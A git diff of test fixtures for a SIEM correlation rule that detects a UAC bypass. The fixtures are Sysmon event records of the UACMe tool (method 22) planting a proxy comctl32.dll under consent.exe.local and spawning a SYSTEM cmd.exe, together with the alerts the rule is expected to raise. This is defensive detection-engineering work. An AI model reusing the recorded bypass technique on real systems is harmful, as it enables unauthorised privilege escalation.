"object.fullpath": "c:\\users\\ieuser\\appdata\\local\\temp\\comctl32.dll", "object.name": "comctl32.dll", "object.path": 
"c:\\users\\ieuser\\appdata\\local\\temp\\", "object.property": "creation time", "object.value": "2019-08-03T12:08:13.721Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\explorer.exe", "subject.process.guid": "747f3d96-792d-5d45-0000-00104f190601", "subject.process.id": "5336", "subject.process.name": "explorer.exe", "subject.process.path": "c:\\windows\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.721Z", "type": "raw", "uuid": "114bdb77-3e56-4e56-91f1-c348231ab6e7"}
+{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.6360892Z\"},\"EventRecordID\":\"5437\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.624\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ProcessId\",\"text\":\"5336\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.9.1905\"},{\"Name\":\"Description\",\"text\":\"UACMe main module\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"CommandLine\",\"text\":\"UACME.exe 
22\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020fbd31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3fb\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9E57914D39FBFE785C915E225011892613C4714C,MD5=D57E778DF10F801F47119A04BE990FFD,SHA256=D76815CE3F4B9FE7A611D6F536F65AF313E2AB2F8BB52EF0998487D89A6E7378,IMPHASH=B6789EDFE23DDA911AE37C87444D3DCB\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5a29-5d45-0000-0010deb99000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5780\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020fbd31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "1627131", "object.process.cmdline": "UACME.exe 22", "object.process.cwd": "C:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", 
"object.process.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.hash.imphash": "B6789EDFE23DDA911AE37C87444D3DCB", "object.process.hash.md5": "D57E778DF10F801F47119A04BE990FFD", "object.process.hash.sha1": "9E57914D39FBFE785C915E225011892613C4714C", "object.process.hash.sha256": "D76815CE3F4B9FE7A611D6F536F65AF313E2AB2F8BB52EF0998487D89A6E7378", "object.process.id": "5336", "object.process.meta": "Description:UACMe main module | Product:UACMe | Company:Hazardous Environments", "object.process.name": "uacme.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-5a29-5d45-0000-0010deb99000", "object.process.parent.id": "5780", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\desktop\\", "object.process.version": "3.1.9.1905", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "1627131", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.624Z", "type": "raw", "uuid": "a82cad3b-7c34-44ff-afea-535b46c1e49e"}
-# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
-expect 1 {"_rule": "UAC_Bypass_Via_Consent", "correlation_name": "UAC_Bypass_Via_Consent", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe"}
\ No newline at end of file
+expect 2 {"action": "start", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Bypass User Account Control", "correlation_name": "UAC_Bypass_Via_Consent", "correlation_type": "event", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "UAC_Bypass_Via_Consent|msedgewin10|consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": 
"c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.session_id": "999", "subject.process.cwd": "C:\\Windows\\system32\\", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "subject.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "subject.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "subject.process.name": "consent.exe", "subject.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "subject.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "subject.process.parent.id": "896", "subject.process.parent.name": "svchost.exe", "subject.process.parent.path": "c:\\windows\\system32\\", "subject.process.path": "c:\\windows\\system32\\", "subject.process.version": "10.0.17763.1 (WinBuild.160101.0800)"}
\ No newline at end of file
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_2.sc
index 08063098..2550dac4 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_2.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_2.sc
@@ -1,22 +1,21 @@
-# Здесь укажи какие нормализованные события ты подаёшь на вход корреляци
-{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:55.4089224Z\"},\"EventRecordID\":\"5455\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:55.376\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7957-5d45-0000-00100e620a01}\"},{\"Name\":\"ProcessId\",\"text\":\"3116\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BCAF0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BCAF0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7957-5d45-0000-00100e620a01", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "3116", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:55.376Z", "type": "raw", "uuid": "307840cf-68d8-4456-803b-09d028088acc" }
-{ "action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5551743Z\"},\"EventRecordID\":\"5453\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.377\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"SourceProcessId\",\"text\":\"7564\"},{\"Name\":\"SourceThreadId\",\"text\":\"7188\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\consent.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-7937-5d45-0000-00100d290801}\"},{\"Name\":\"TargetProcessId\",\"text\":\"4192\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+a0fb4|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+47241|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+46196|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+1c2e3|UNKNOWN(000001611150B621)|UNKNOWN(000001611150B621)|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+48f07|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44865|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44648|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44672|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+d62ca|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+c3879|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+756c3|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+7566e\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": 
"Manipulation", "datafield5": "7188", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+47241|C:\\Windows\\System32\\KERNELBASE.dll+46196|C:\\Windows\\System32\\KERNEL32.DLL+1c2e3|UNKNOWN(000001611150B621)|UNKNOWN(000001611150B621)|C:\\Windows\\SYSTEM32\\ntdll.dll+48f07|C:\\Windows\\SYSTEM32\\ntdll.dll+44865|C:\\Windows\\SYSTEM32\\ntdll.dll+44648|C:\\Windows\\SYSTEM32\\ntdll.dll+44672|C:\\Windows\\SYSTEM32\\ntdll.dll+d62ca|C:\\Windows\\SYSTEM32\\ntdll.dll+c3879|C:\\Windows\\SYSTEM32\\ntdll.dll+756c3|C:\\Windows\\SYSTEM32\\ntdll.dll+7566e", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7937-5d45-0000-00100d290801", "object.process.id": "4192", "object.process.name": "cmd.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "subject.process.id": "7564", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.377Z", "type": "raw", "uuid": 
"6495c614-7815-48db-b001-15f7a3b97059" }
-{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5547781Z\"},\"EventRecordID\":\"5452\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.391\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7937-5d45-0000-00100d290801}\"},{\"Name\":\"ProcessId\",\"text\":\"4192\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ParentProcessId\",\"text\":\"7564\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7937-5d45-0000-00100d290801", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", 
"object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4192", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.parent.id": "7564", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.391Z", "type": "raw", "uuid": "32c28c58-c00a-498a-9029-76636a5f0bb7" }
-{ "action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5243142Z\"},\"EventRecordID\":\"5451\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - DLL Hijack - UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.363\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ProcessId\",\"text\":\"7564\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\\\comctl32.dll\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.8.1904\"},{\"Name\":\"Description\",\"text\":\"UACMe proxy DLL\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": 
"PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "subject.process.id": "7564", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.363Z", "type": "raw", "uuid": "4d0abd6d-a99b-4817-a3e0-6438c1b28920" }
-{ "action": "start", "body": 
